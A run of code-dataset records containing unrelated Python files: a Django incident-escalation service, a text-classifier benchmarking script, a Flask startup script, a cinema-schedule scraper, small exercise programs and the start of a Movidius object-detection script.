\"\"\"\n SELECT usr.id, COUNT(incident.id) as incident_count FROM `auth_user` as usr \n LEFT JOIN incidents_incident as incident on incident.assignee_id = usr.id \n INNER JOIN auth_user_groups on usr.id = auth_user_groups.user_id\n INNER JOIN auth_group as grp on grp.id = auth_user_groups.group_id\n WHERE grp.rank = %d\n GROUP BY usr.id\n ORDER BY incident_count ASC\n \"\"\" % user_group.rank\n\n with connection.cursor() as cursor:\n cursor.execute(sql)\n row = cursor.fetchone()\n\n if row is None:\n return (\"error\", \"Error in finding auto assignment\")\n\n assignee = User.objects.get(id=row[0])\n incident.assignee = assignee\n incident.save()\n\n return (\"success\", \"Auto assign completed\", assignee)\n\n\ndef incident_escalate(user: User, incident: Incident, escalate_dir: str = \"UP\"):\n # find the rank of the current incident assignee\n assignee_groups = incident.assignee.groups.all()\n if len(assignee_groups) == 0:\n raise WorkflowException(\"No group for current assignee\")\n\n current_rank = assignee_groups[0].rank\n\n # if escalate UP\n next_rank = current_rank - 1\n if escalate_dir == \"DOWN\":\n next_rank = current_rank + 1\n\n next_group = Group.objects.get(rank=next_rank)\n if next_group is None:\n raise WorkflowException(\"Can't escalate %s from here\" % escalate_dir)\n\n result = incident_auto_assign(incident, next_group)\n event_services.create_assignment_event(user, incident, result[2])\n\n\ndef incident_change_assignee(user: User, incident: Incident, assignee: User):\n incident.assignee = assignee\n incident.save()\n\n event_services.create_assignment_event(user, incident, assignee)\n\n\ndef incident_close(user: User, incident: Incident, comment: str):\n # find number of outcomes for the incident\n outcomes = IncidentComment.objects.filter(\n incident=incident, is_outcome=True).count()\n\n if incident.hasPendingStatusChange == \"T\":\n raise WorkflowException(\"Incident has pending changes, can not close\")\n\n if incident.current_status == StatusType.ACTION_PENDING:\n raise WorkflowException(\n \"All pending actions needs to be resolved first\")\n\n if outcomes == 0:\n raise WorkflowException(\n \"Incident need at least 1 outcome before closing\")\n\n status = IncidentStatus(\n current_status=StatusType.CLOSED,\n previous_status=incident.current_status,\n incident=incident\n )\n\n if user.has_perm(\"incidents.can_request_status_change\"):\n # if user can't directly change the status\n # only a pending change is added\n status.approved = False\n status.save()\n\n incident.hasPendingStatusChange = \"T\"\n incident.save()\n\n event_services.update_status_with_description_event(\n user, incident, status, False, comment)\n\n elif user.has_perm(\"incidents.can_change_status\"):\n status.approved = True\n status.save()\n\n incident.hasPendingStatusChange = \"F\"\n incident.save()\n\n event_services.update_status_with_description_event(\n user, incident, status, True, comment)\n\n\ndef incident_escalate_external_action(user: User, incident: Incident, comment: str):\n # new event\n status = IncidentStatus(\n current_status=StatusType.ACTION_PENDING,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n event_services.start_action_event(user, incident, status, comment)\n\n\ndef incident_complete_external_action(user: User, incident: Incident, comment: str, start_event: Event):\n # new event\n status = IncidentStatus(\n current_status=StatusType.ACTION_PENDING,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n event_services.complete_action_event(\n user, incident, status, comment, start_event)\n\n\ndef incident_request_advice(user: User, incident: Incident, assignee: User, comment: str):\n status = IncidentStatus(\n current_status=StatusType.ADVICE_REQESTED,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n incident.linked_individuals.append(assignee)\n incident.save()\n\n event_services.update_status_with_description_event(user, incident, status, True, comment)\n\n\ndef incident_provide_advice(user: User, incident: Incident, advice: str):\n if user not in incident.linked_individuals:\n raise WorkflowException(\"User not linked to the given incident\")\n\n if incident.current_status != StatusType.ADVICE_REQESTED:\n raise WorkflowException(\"Incident does not have pending advice requests\")\n\n status = IncidentStatus(\n current_status=StatusType.ADVICE_PROVIDED,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n # check this\n incident.linked_individuals.remove(user.id)\n\n event_services.update_status_with_description_event(user, incident, status, True, advice)\n\ndef incident_verify(user: User, incident: Incident, comment: str):\n if incident.current_status != StatusType.NEW.name:\n raise WorkflowException(\"Can only verify unverified incidents\")\n\n status = IncidentStatus(\n current_status=StatusType.VERIFIED,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n event_services.update_status_with_description_event(user, incident, status, True, comment)\n","sub_path":"backend/src/incidents/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":11823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136871919","text":"import argparse\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer as CV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, label_binarize\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.metrics import roc_curve, auc, confusion_matrix, accuracy_score, precision_score, recall_score, f1_score\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, MaxPooling1D, Conv1D, LSTM, Embedding\nfrom keras import utils\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing import text\nfrom scipy import interp\nimport pandas as pd\nimport sys\n\n\ndef bagofwords_conversion(corpus, grams=1):\n m = CV(ngram_range=(1, grams), min_df=1)\n m.fit(corpus)\n return m\n\n\ndef load_round1_data(fp):\n corpus = []\n labels = []\n if sys.version_info >= (3, 0):\n f = open(fp, encoding=\"utf-8\")\n else:\n f = open(fp)\n for line in f:\n line = [i.strip().lower() for i in line.split('\\t')]\n assert len(line) == 2, ValueError(\"Format of input file {} is wrong at line {}\".format(fp, line))\n labels.append(line[1])\n corpus.append(line[0])\n return corpus, labels\n\n\ndef diagnostic_samples(preds, xtest, labels, labeldecoder, worddecoder):\n labels = labeldecoder.inverse_transform(labels)\n samples = worddecoder.inverse_transform(xtest)\n preds2 = labeldecoder.inverse_transform(preds)\n cnt = 0\n for q, l1, l2 in zip(samples, preds2, labels):\n if l1 != l2:\n print(\"Question: {}, Prediction:{}, Label: {}\".format(q, l1, l2))\n cnt += 1\n if cnt > 10:\n return\n\n\ndef calculate_aucs(y_test, y_score, name, plot=False):\n # Compute ROC curve and ROC area for each class\n y_test = y_test.squeeze()\n y_score = y_score.squeeze()\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n classes = sorted(set(y_test))\n n_classes = len(classes)\n y_test = label_binarize(y_test, classes)\n y_score = label_binarize(y_score, classes)\n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n # Compute macro-average ROC curve and ROC area\n\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\n\n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(n_classes):\n mean_tpr += interp(all_fpr, fpr[i], tpr[i])\n\n # Finally average it and compute AUC\n mean_tpr /= n_classes\n\n fpr[\"macro\"] = all_fpr\n tpr[\"macro\"] = mean_tpr\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\n\n # Compute macro-average ROC curve and ROC area\n\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\n\n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(n_classes):\n mean_tpr += interp(all_fpr, fpr[i], tpr[i])\n\n # Finally average it and compute AUC\n mean_tpr /= n_classes\n\n fpr[\"macro\"] = all_fpr\n tpr[\"macro\"] = mean_tpr\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\n return roc_auc\n\n\ndef calculate_metrics(true, pred, name):\n names.append(name)\n acc = accuracy_score(pred, true)\n accs.append(acc)\n pre = precision_score(pred, true, average=\"micro\")\n pre2 = precision_score(pred, true, average=\"macro\")\n rec = recall_score(pred, true, average=\"micro\")\n rec2 = recall_score(pred, true, average=\"macro\")\n recs.append(rec)\n recs2.append(rec2)\n pres.append(pre)\n pres2.append(pre2)\n f1 = f1_score(pred, true, average=\"micro\")\n f12 = f1_score(pred, true, average=\"macro\")\n f1s.append(f1)\n f1s2.append(f12)\n aucs = calculate_aucs(true, pred, name, False)\n maaucs.append(aucs[\"macro\"])\n miaucs.append(aucs[\"micro\"])\n conf = confusion_matrix(true, pred)\n confs.append(conf)\n\n\ndef sklearn_routine(lr_model, name):\n lr_model.fit(Xtrain, Ytrain)\n print(\"----{}: Training Accuracy----\".format(name))\n acc1 = lr_model.score(Xtrain, Ytrain)\n print(\"{:.3f}\".format(acc1))\n print(\"----{}: Testing Accuracy----\".format(name))\n preds = lr_model.predict(Xtest)\n acc2 = lr_model.score(Xtest, Ytest)\n print(\"{:.3f}\".format(acc2))\n calculate_metrics(Ytest, preds, name)\n if args.mode != \"tf\":\n diagnostic_samples(preds, Xtest, Ytest, labelEncoder, bagOfWords)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Perform some initial testing for question intention model training\")\n parser.add_argument(\"--data\", default=\"./training_data.csv\", help=\"Path of training data in csv (headerless)\\\n format\")\n parser.add_argument(\"--model\", default=\"./models\", help=\"Directory to output of models\")\n parser.add_argument(\"--grams\", default=1, type=int, help=\"Number of n-grams\")\n parser.add_argument(\"--batch\", default=500, type=int, help=\"minibatch batch size\")\n parser.add_argument(\"--epoch\", default=20, type=int, help=\"Number of epochs\")\n parser.add_argument(\"--debug\", default=False, action=\"store_true\", help=\"Output debugging info\")\n parser.add_argument(\"--mode\", default=\"lr\", help=\"\"\"Mode of action:\n lr -- logistic regression models and a basic naive bayes.\n mc -- collection of multiclass classifiers from sklearn.\n tf -- tensorflow linear classifiers + keras vectorizer\n rnn -- CNN + vRNN\n \"\"\")\n args = parser.parse_args()\n if args.mode not in [\"lr\", \"mc\", \"tf\"]:\n raise NotImplementedError(\"Mode {} is not supported\".format(args.mode))\n else:\n corpus, raw_labels = load_round1_data(args.data)\n bagOfWords = bagofwords_conversion(corpus, args.grams)\n vectorizedData = bagOfWords.transform(corpus)\n labelEncoder = LabelEncoder()\n intLabels = labelEncoder.fit_transform(raw_labels)\n intLabels = intLabels.reshape(-1, 1)\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(vectorizedData, intLabels, test_size=0.2)\n num_classes = len(set(list(Ytrain.squeeze())))\n df = pd.DataFrame()\n class_labels = labelEncoder.inverse_transform([i for i in range(num_classes)])\n accs = pres = pres2 = recs = recs2 = f1s = f1s2 = maaucs = miaucs = names = confs = []\n\n if args.mode == \"lr\":\n for lr_model, name in zip([\n LogisticRegression(multi_class=\"multinomial\", solver=\"lbfgs\"),\n LogisticRegressionCV(multi_class=\"multinomial\", solver=\"lbfgs\"),\n MultinomialNB()\n ], [\n \"LogisticRegression\",\n \"LogisticRegression+CrossValidation\",\n \"Naive Bayes multinomial\"\n ]):\n sklearn_routine(lr_model, name)\n\n elif args.mode == \"mc\":\n\n classifiers = [\n KNeighborsClassifier(3),\n SVC(kernel=\"linear\", C=0.025),\n SVC(gamma=2, C=1),\n DecisionTreeClassifier(max_depth=5),\n RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\n MLPClassifier(alpha=1),\n AdaBoostClassifier(),\n ]\n\n names_ = [\"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\",\n \"Decision Tree\", \"Random Forest\", \"Neural Net\", \"AdaBoost\"]\n\n for lr_model, name in zip(classifiers, names_):\n sklearn_routine(lr_model, name)\n\n elif args.mode == \"tf\":\n\n def mat_to_if(matrix, labels):\n return tf.estimator.inputs.numpy_input_fn(\n {\"x\": matrix},\n labels,\n batch_size=args.batch,\n num_epochs=args.epoch,\n shuffle=False\n )\n\n def mat_to_if_test(matrix):\n return tf.estimator.inputs.numpy_input_fn(\n {\"x\": matrix},\n shuffle=False\n )\n names = []\n tokenizer = text.Tokenizer(char_level=False)\n tokenizer.fit_on_texts(corpus)\n vectorizedData = tokenizer.texts_to_matrix(corpus, mode=\"freq\")\n # consider only doing this for train\n labelEncoder = LabelEncoder()\n intLabels = labelEncoder.fit_transform(raw_labels)\n intLabels = intLabels.reshape(-1, 1)\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(vectorizedData, intLabels, test_size=0.2)\n Ytrain2 = utils.to_categorical(Ytrain, num_classes)\n Ytest2 = utils.to_categorical(Ytest, num_classes)\n\n # Model 0, linear estimator (logistic regression)\n if args.debug:\n tf.logging.set_verbosity(tf.logging.INFO)\n\n def train_lc():\n with tf.Session():\n model = tf.estimator.LinearClassifier(\n [tf.feature_column.numeric_column(\"x\", Xtrain.shape[1])],\n n_classes=num_classes,\n model_dir=\"{}/lcestimator\".format(args.model)\n )\n history = model.train(input_fn=mat_to_if(Xtrain, Ytrain))\n score = model.evaluate(input_fn=mat_to_if(Xtest, Ytest))\n print(\"train score\", history)\n print('Test score:', score)\n preds = [r for r in model.predict(mat_to_if_test(Xtest))]\n preds = [r[\"class_ids\"] for r in preds]\n preds = np.array(preds).astype(np.int64).squeeze()\n name = \"LinearClassifier,default\"\n calculate_metrics(preds, Ytest, name)\n\n def train_lc2():\n with tf.Session():\n model = tf.estimator.LinearClassifier(\n [tf.feature_column.numeric_column(\"x\", Xtrain.shape[1])],\n n_classes=num_classes,\n model_dir=\"{}/lcestimator2\".format(args.model),\n optimizer=lambda: tf.train.FtrlOptimizer(\n learning_rate=tf.train.exponential_decay(\n learning_rate=0.1,\n global_step=tf.train.get_global_step(),\n decay_steps=10000,\n decay_rate=0.96)\n )\n )\n history = model.train(input_fn=mat_to_if(Xtrain, Ytrain))\n score = model.evaluate(input_fn=mat_to_if(Xtest, Ytest))\n print(\"train score\", history)\n print('Test score:', score)\n preds = [r for r in model.predict(mat_to_if_test(Xtest))]\n preds = [r[\"class_ids\"] for r in preds]\n preds = np.array(preds).astype(np.int64).squeeze()\n name = \"LinearClassifier,FtrlWeightDecay\"\n calculate_metrics(preds, Ytest, name)\n\n # Model 1, NN equivalent of LR\n def train_lr_nn():\n with tf.Session():\n model = Sequential()\n model.add(Dense(num_classes, input_shape=(Xtest.shape[1],)))\n model.add(Activation('softmax'))\n model.compile(optimizer='sgd', loss='categorical_crossentropy', metrics=['accuracy'])\n history = model.fit(Xtrain, Ytrain2,\n batch_size=args.batch,\n epochs=args.epoch,\n verbose=1,\n validation_split=0.1)\n model.save(\"{}/lrnn.h5\".format(args.model))\n score = model.evaluate(Xtest, Ytest2, verbose=1)\n print('Train score:', history)\n print('Test score:', score)\n preds = model.predict(Xtest)\n preds = np.argmax(preds, axis=1).squeeze()\n name = \"LogisticRegressionAsNN\"\n calculate_metrics(preds, Ytest, name)\n\n # Model 2, NN with dropout\n def train_nn():\n with tf.Session():\n model = Sequential()\n model.add(Dense(512, input_shape=(Xtest.shape[1],)))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n history = model.fit(Xtrain, Ytrain2,\n batch_size=args.batch,\n epochs=args.epoch,\n verbose=1,\n validation_split=0.1)\n\n # Evaluate the accuracy of our trained model\n score = model.evaluate(Xtest, Ytest2, verbose=1)\n model.save(\"{}/nn.h5\".format(args.model))\n print('Train score:', history)\n print('Test score:', score)\n preds = model.predict(Xtest)\n preds = np.argmax(preds, axis=1).squeeze()\n name = \"NNwithDropout,1hidden\"\n calculate_metrics(preds, Ytest, name)\n\n def train_nn2():\n with tf.Session():\n model = Sequential()\n model.add(Dense(512, input_shape=(Xtest.shape[1],)))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(128))\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n history = model.fit(Xtrain, Ytrain2,\n batch_size=args.batch,\n epochs=args.epoch,\n verbose=1,\n validation_split=0.1)\n\n # Evaluate the accuracy of our trained model\n score = model.evaluate(Xtest, Ytest2, verbose=1)\n model.save(\"{}/nn2.h5\".format(args.model))\n print('Train score:', history)\n print('Test score:', score)\n preds = model.predict(Xtest)\n preds = np.argmax(preds, axis=1).squeeze()\n name = \"NNwithDropout,2hidden\"\n calculate_metrics(preds, Ytest, name)\n\n def train_lstm_cnn():\n with tf.Session():\n seqs = tokenizer.texts_to_sequences(corpus)\n maxlen = max(map(len, seqs))\n print(\"maxlen is {}\".format(maxlen))\n seqs = pad_sequences(seqs, maxlen=maxlen)\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(seqs, intLabels, test_size=0.2)\n Ytrain2 = utils.to_categorical(Ytrain, num_classes)\n Ytest2 = utils.to_categorical(Ytest, num_classes)\n model = Sequential()\n model.add(Embedding(2000, 128, input_length=maxlen))\n model.add(Dropout(0.25))\n model.add(Conv1D(64, 5,\n padding='valid',\n activation='relu',\n strides=1))\n model.add(MaxPooling1D(pool_size=4))\n model.add(LSTM(70))\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n history = model.fit(Xtrain, Ytrain2,\n batch_size=int(args.batch/10),\n epochs=args.epoch,\n verbose=1,\n validation_split=0.1)\n\n # Evaluate the accuracy of our trained model\n score = model.evaluate(Xtest, Ytest2, verbose=1)\n model.save(\"{}/lstmcnn.h5\".format(args.model))\n print('Train score:', history)\n print('Test score:', score)\n preds = model.predict(Xtest)\n preds = np.argmax(preds, axis=1).squeeze()\n name = \"NNwithDropout,lstmcnn\"\n calculate_metrics(preds, Ytest, name)\n\n def train_lstm_rnn():\n pass\n train_lc()\n train_lc2()\n train_nn2()\n train_nn()\n train_lr_nn()\n else:\n raise NotImplementedError(\"Mode {} is not supported\".format(args.mode))\n df[\"Model\"] = names\n df[\"Testing Accuracy\"] = accs\n df[\"Testing Precision, micro-average\"] = pres\n df[\"Testing Precision, macro-average\"] = pres2\n df[\"Testing Recall, micro-average\"] = recs\n df[\"Testing Recall, macro-average\"] = recs2\n df[\"Testing F1, micro-average\"] = f1s\n df[\"Testing F1, macro-average\"] = f1s2\n df[\"micro-average ROC AUC\"] = miaucs\n df[\"macro-average ROC AUC\"] = maaucs\n df[\"labels\"] = [class_labels for i in names]\n df[\"confusion_matrix\"] = confs\n df.to_csv(\"{}/{}.metrics.csv\".format(args.model, args.mode), sep=\"\\t\", header=True, index=False)\n","sub_path":"test_models_r1.py","file_name":"test_models_r1.py","file_ext":"py","file_size_in_byte":17846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401559273","text":"__author__ = 'farzin'\n\nimport os\n\nfrom app.models import User\nfrom app import create_app, db\n\n\nif __name__ == '__main__':\n app = create_app(os.environ.get('FLASK_CONFIG', 'development'))\n\n with app.app_context():\n db.create_all()\n\n # create a development user\n if User.query.get(1) is None:\n print('ssssssssssssss')\n admin = User('farzin1', 'ehsanroman74@gmail.com')\n\n try:\n db.session.add(admin)\n db.session.commit()\n except Exception as e:\n print(e)\n app.run()\n","sub_path":"presenterHelper/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374538796","text":"#Даны 2 действительных числа a и b. Получить их сумму, разность и произведение.\n\na = int(input(\"Ведите любое действительное число: \"))\nb = int(input(\"Введите ещё одно действительное число: \"))\n\nsum_num = a+b\ndif_num = a-b\nmult_num = a*b\n\nprint(\"Сумма ваших чисел = \" + str(sum_num))\nprint(\"Разность ваших чисел = \" + str(dif_num))\nprint(\"А произведение ваших чисел = \" + str(mult_num))\n\n\n\n","sub_path":"task_1_1.py","file_name":"task_1_1.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429373830","text":"'''\nThis file specifies all requirements for each easy_deploy config command\n'''\n\nCOMMANDS = {\n 'installDebianPackage': {\n 'mandatory': ['source'],\n },\n 'installFile': {\n 'mandatory': ['localSource', 'remoteSource'],\n 'optional': {\n 'group': 'root',\n 'mode': '0644',\n 'owner': 'root',\n }\n },\n 'removeDebianPackage': {\n 'mandatory': ['source'],\n },\n}\n\nUNIVERSAL_OPTIONS = ['command', 'restarts']\n","sub_path":"easy_deploy/util/config_requirements_def.py","file_name":"config_requirements_def.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638369105","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport urllib2\nimport re\nimport pickle\nfrom PIL import Image\nfrom HTMLParser import HTMLParser\n\nclass MLStripper(HTMLParser):\n def __init__(self):\n self.reset()\n self.fed = []\n def handle_data(self, d):\n self.fed.append(d)\n def get_data(self):\n return ''.join(self.fed)\n\ndef strip_tags(html):\n s = MLStripper()\n s.feed(html)\n return s.get_data()\n\ndef getFullUrls():\n page = urllib2.urlopen('http://28cinema.az/ru/').read()\n marker_1 = page.find('
    Сегодня
    ')\n marker_2 = page.find('
    ')\n today = page[marker_1:marker_2]\n\n URLs = []\n while (today.find('
    ') != -1):\n mark_1 = today.find('
    ')\n mark_2 = today.find('
    ',mark_1)\n\n temp_block = today[mark_1:mark_2]\n\n mark_3 = temp_block.find('')\n poster_marker_2 = page.find('
    ')\n\n poster = page[poster_marker_1:poster_marker_2]\n\n post_marker_1 = poster.find('')\n marker_2 = page.find('
    ',marker_1)\n\n description = page[marker_1 + 25 : marker_2 + 15]\n\n description = description.replace('

    ','***').replace('

    ','***')\n description = description.replace('

    ','')\n description = description.replace('

    ','***')\n #description = description.replace('','').replace('','') \n description = description.replace(' ','')\n description = description.replace('\\n','')\n description = HTMLParser.HTMLParser().unescape(description.decode('utf-8'))\n description = description.replace('','111111111').replace('','222222222')\n description = strip_tags(description)\n description = description.replace('111111111','').replace('222222222','')\n\n time_hall_marker_1 = page.find('

    ')\n time_hall_marker_2 = page.find('
    ')\n\n time_hall = page[time_hall_marker_1:time_hall_marker_2]\n\n time_hall = time_hall[time_hall.find(''):time_hall.find('
    ')]\n\n time_hall = time_hall.replace('','***').decode('utf-8')\n time_hall = time_hall = strip_tags(time_hall)\n time_hall = time_hall.split('***')[1:]\n\n hallTimeDict = {}\n for item in time_hall:\n if item != '':\n time = item[:5]\n hall = '' + item[5:] + ':' + ''\n if hall not in hallTimeDict.keys():\n hallTimeDict[hall] = ' ' + time\n else:\n newItem = hallTimeDict[hall] + ' ' + time\n hallTimeDict[hall] = newItem\n\n time_hall = ''\n \n if len(hallTimeDict) == 1:\n key = hallTimeDict.keys()[0]\n temp = hallTimeDict[key]\n time_hall = key + temp\n else:\n counter = 0\n for item in hallTimeDict.keys():\n if (len(hallTimeDict) - counter) != 1:\n temp = hallTimeDict[item]\n time_hall += item + temp + '
    '\n counter += 1\n else:\n temp = hallTimeDict[item]\n time_hall += item + temp\n\n final = ''\n \n temp_order = description.split('***')\n\n name = temp_order[0]\n date = temp_order[1]\n country = temp_order[2]\n if \",\" in country:\n country = country[:country.find(\",\")]\n year = temp_order[3]\n director = temp_order[4]\n if \",\" in director:\n director = director[:director.find(\",\")]\n cast = temp_order[5]\n if (\",\" in cast) and (cast.count(\",\") >= 3):\n counter = 0\n mark_cast = 0\n for comma in range(cast.count(\",\")):\n counter += 1\n mark_cast = cast.find(\",\",mark_cast) + 1\n if counter == 3:\n cast = cast[:mark_cast - 1]\n break\n genre = temp_order[6]\n if (\",\" in genre) and (genre.count(\",\") > 1):\n counter = 0\n mark_genre = 0\n for comma in range(genre.count(\",\")):\n counter += 1\n mark_genre = genre.find(\",\",mark_genre) + 1\n if counter == 2:\n genre = genre[:mark_genre - 1]\n break\n duration = temp_order[7]\n restrictions = 'Возрастные ограничения: '.decode('utf-8') + re.sub(\"\\D\", \"\", temp_order[8]) + '+'\n description = 'Описание: '.decode('utf-8') + '
    '+ temp_order[9]\n\n date = date.replace(' ','').split('-')\n date = ('Дата показа: ' + 'c ').decode('utf-8') + date[0][:5]\n \n final = name + '***' + date + '
    ' + time_hall + '***' + thumb + '***' + poster + '***' + country + '
    ' + year + '
    ' + duration + '
    ' + director + '
    ' + cast + '
    ' + genre + '
    ' + restrictions + '***' + description\n \n movies += final + '$$$'\n \n movies = movies.encode('utf-8')\n f = open('28Today.html','w')\n f.write(movies)\n f.close()\n \ngetMovies()\n \n","sub_path":"Parsers [Python]/28Cinema/28Today.py","file_name":"28Today.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69215491","text":"import libreria\n\ndef econtratado():\n print(\" se eligio la opcion del empleado contratado\")\n empleado=libreria.pedir_nombre(\"ingrese nombre del empleado\")\n sueldo=libreria.pedir_numero(\"ingrese sueldo\",1,2000)\n if(sueldo>1500):\n print(\"tienes bonos adicionales\")\n contenido=empleado+\"-->\"+str(sueldo)+\"\\n\"\n libreria.guardar_datos(\"info.txt\",contenido,\"a\")\n print(\"los datos han sido guardados\")\ndef enombrado():\n print(\" se eligio la opcion del empleado nombrado\")\n empleado=libreria.pedir_nombre(\"ingrese nombre del empleado\")\n sueldo=libreria.pedir_numero(\"ingrese sueldo\",1,3000)\n if(sueldo>2500):\n print(\"tienes bonos adicionales\")\n contenido=empleado+\"-->\"+str(sueldo)+\"\\n\"\n libreria.guardar_datos(\"info.txt\",contenido,\"a\")\n print(\"los datos han sido guardados\")\n\ndef aempleado():\n print(\"se eligio la opcion agregar empleado\")\n opc=0\n max=3\n while(opc!=max):\n print(\"###############SUBMENU#############\")\n print(\"1. empleado contratado\")\n print(\"2. empleado nombrado\")\n print(\"3. salir\")\n print(\"###################################\")\n #elegir opciones del submenu\n opc=libreria.pedir_numero(\"ingrese opcion:\",1,3)\n #elaborar el mapeo de opciones del submenu\n if(opc==1):\n econtratado()\n if(opc==2):\n enombrado()\n\n#MENU PRINCIPAL------->\n\ndef aempresa():\n print(\"se eligio la opcion agregar empresa\")\nopc=0\nmax=3\nwhile(opc!=max):\n print(\"#############MENU############\")\n print(\"1. agregar empleado\")\n print(\"2. agregar empresa\")\n print(\"3. salir\")\n print(\"#############################\")\n #eligir opciones del menu\n opc=libreria.pedir_numero(\"ingrese opcion:\",1,3)\n #elaborar el mapeo de opciones\n if(opc==1):\n aempleado()\n if(opc==2):\n aempresa()\n\nprint(\"FIN DEL PROGRAMA\")\n","sub_path":"ejercicio13.py","file_name":"ejercicio13.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374317727","text":"import Program\nimport Cube2\nimport math3d\nfrom Texture import ImageTexture\n\n\nclass World(object):\n def __init__(self,filename):\n self.map = filename\n self.worldMat = 0\n self.data = []\n fp = open(filename,\"r\")\n for i in fp:\n self.data.append(i)\n self.c_list = []\n self.tex = ImageTexture(\"brick.png\")\n self.tex2 = ImageTexture(\"roof.png\")\n self.tex3 = ImageTexture(\"brickfloor.png\")\n self.c = Cube2.Cube2()\n\n\n\n\n\n def draw(self,prog):\n\n prog.setUniform(\"tex\",self.tex)\n for i in range(len(self.data)):\n for j in range(len(self.data[i])):\n if self.data[i][j] == \"*\":\n self.worldMat = math3d.translation([j*2,0,-i*2])\n prog.setUniform(\"worldMatrix\",self.worldMat)\n self.c.draw(prog)\n \n prog.setUniform(\"tex\",self.tex2)\n for i in range(len(self.data)):\n for j in range(len(self.data[i])):\n self.worldMat = math3d.translation([j*2,2,-i*2])\n prog.setUniform(\"worldMatrix\",self.worldMat)\n self.c.draw(prog)\n prog.setUniform(\"tex\",self.tex3)\n for i in range(len(self.data)):\n for j in range(len(self.data[i])):\n self.worldMat = math3d.translation([j*2,-2,-i*2])\n prog.setUniform(\"worldMatrix\",self.worldMat)\n self.c.draw(prog)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ETGG2801 Labs/lab14/World.py","file_name":"World.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165750400","text":"#!/usr/bin/python3\n\n# ****************************************************************************\n# Copyright(c) 2017 Intel Corporation.\n#\n# Code adapted by Mark West from the\n# https://github.com/movidius/ncappzoo/tree/master/apps/live-object-detector\n# project.\n#\n# License: MIT See LICENSE file in root directory.\n# ****************************************************************************\n\n# Detect objects on a LIVE camera feed using\n# Intel® Movidius™ Neural Compute Stick (NCS)\n\nimport os\nimport cv2\nimport sys\nimport numpy\nimport ntpath\nimport argparse\nimport time\n\nfrom imutils.video import FPS\nfrom imutils.video import VideoStream\n\nimport mvnc.mvncapi as mvnc\n\nfrom utils import visualize_output\nfrom utils import deserialize_output\n\n# Detection threshold: Minimum confidance to tag as valid detection\nCONFIDANCE_THRESHOLD = 0.60 # 60% confidant\n\n# Variable to store commandline arguments\nARGS = None\n\n# ---- Step 1: Open the enumerated device and get a handle to it -------------\n\ndef open_ncs_device():\n\n # Look for enumerated NCS device(s); quit program if none found.\n devices = mvnc.EnumerateDevices()\n if len( devices ) == 0:\n print( \"No devices found\" )\n quit()\n\n # Get a handle to the first enumerated device and open 